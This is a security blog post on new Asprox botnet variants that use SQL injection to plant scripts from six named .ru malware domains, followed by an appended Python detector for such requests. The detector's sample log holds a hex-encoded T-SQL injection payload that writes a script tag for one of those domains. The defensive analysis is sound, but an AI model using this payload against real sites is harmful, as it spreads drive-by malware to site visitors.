Do you remember Asprox, the botnet that used SQL injection attacks combined with results from search engines like Google to automatically infect Microsoft IIS-powered websites? We gave a talk (slides) about it at the last Virus Bulletin conference, and for about a month now we've been seeing new variants in the wild.
As last December, a blind SQL injection targeting ASP pages that use Transact-SQL is attempted, using the following string as a request argument:
As this string is concatenated with the HTML
www.ads-t.ru/ads.js www.bannert.ru/ads.js www.bannerdriven.ru/ads.js www.adtcp.ru/ads.js www.adbnr.ru/ads.js www.htmlads.ru/ads.js
These sites are set up to trap victims with drive-by-download attacks. The web exploit toolkit powering those attacks was updated to also target the latest vulnerabilities in Adobe Flash (SWF files) and Adobe Reader (PDF files).
The injection vector is still the same as last year (vulnerable server-side scripts); judging from the results we can see, there are still many web applications vulnerable to SQL injection attacks (and I believe this is a never-ending battle). So why would they look for another attack vector? Besides, the web exploit toolkit update ensures a steady rate of newly infected machines and constant growth of their botnet.
At the VB conference, during the Q&A session of our talk, a cunning attendee suggested that the positive side of last year's ubiquitous botnet-powered SQL injection campaigns was that it at least served as a giant pen-test for the Web. Unfortunately, it seems that the aftermath of that pen-test, alarming as it was, did not suffice to raise webmasters' awareness to the point where cybercriminals would stop having an endless supply of machines ready to be infected.
Did you update your third-party software recently?
Fortinet customers are protected by FortiGuard IPS, which detects malicious SQL queries in HTTP requests.
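As an added defensive illustration (not code from this post or from Fortinet), here is a small Python detector for the kind of request described above: it flags query-string arguments that carry a T-SQL batch and decodes any hex literal to recover the host of the injected script tag, matching it against the six domains listed earlier. The DECLARE/CAST(0x...)/EXEC shape of the batch, the combined-format log lines and the sample requests are assumptions, since the post does not reproduce the injected string.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# The six hosts the post names as sources of the injected ads.js.
KNOWN_SCRIPT_HOSTS = {"www.ads-t.ru", "www.bannert.ru", "www.bannerdriven.ru",
                      "www.adtcp.ru", "www.adbnr.ru", "www.htmlads.ru"}

# Assumption (not stated on the page): the T-SQL batch arrives as a hex literal
# handed to CAST(...) and run with EXEC, so a query-string value carrying
# DECLARE + CAST(0x...) + EXEC is treated as an injection attempt.
TSQL_BATCH = re.compile(r"\bDECLARE\b.*\bCAST\s*\(\s*0x[0-9a-f]{8,}.*\bEXEC\b", re.I | re.S)
HEX_LITERAL = re.compile(r"0x([0-9a-f]{8,})", re.I)
SCRIPT_SRC = re.compile(r"<script[^>]*src=[\"']?https?://([^/\"'\s>]+)", re.I)
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def analyse_url(url):
    """Return {'sqli': bool, 'hosts': [...], 'known_host': bool} for one URL."""
    sqli, hosts = False, []
    for _name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        sqli = sqli or bool(TSQL_BATCH.search(value))
        # Decode each hex literal and look for the script tag the batch would
        # append to stored HTML, recording the host it points at.
        for blob in HEX_LITERAL.findall(value):
            try:
                decoded = bytes.fromhex(blob).decode("latin-1")
            except ValueError:  # odd-length run: not a usable literal
                continue
            hosts.extend(h.lower() for h in SCRIPT_SRC.findall(decoded))
    return {"sqli": sqli, "hosts": hosts,
            "known_host": any(h in KNOWN_SCRIPT_HOSTS for h in hosts)}

def scan_log(lines):
    """Return [(url, verdict)] for access-log lines that look like attempts."""
    hits = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if m:
            verdict = analyse_url(m.group(1))
            if verdict["sqli"] or verdict["known_host"]:
                hits.append((m.group(1), verdict))
    return hits

# Constructed sample access log (combined format): one normal request and one
# carrying the hex-encoded batch; the literal decodes to a script tag that
# points at www.ads-t.ru/ads.js.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Feb/2009:10:00:01 +0000] "GET /products.asp?id=12 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Feb/2009:10:00:02 +0000] "GET /products.asp?id=12%3BDECLARE%20@S%20'
    'VARCHAR(4000)%3BSET%20@S=CAST(0x3c736372697074207372633d687474703a2f2f7777772e6164732d'
    '742e72752f6164732e6a733e3c2f7363726970743e%20AS%20VARCHAR(4000))%3BEXEC(@S)%3B-- HTTP/1.1" 200 5120',
]
```

Running `scan_log(SAMPLE_LOG)` reports only the second request, with the decoded script host www.ads-t.ru matched against the known list.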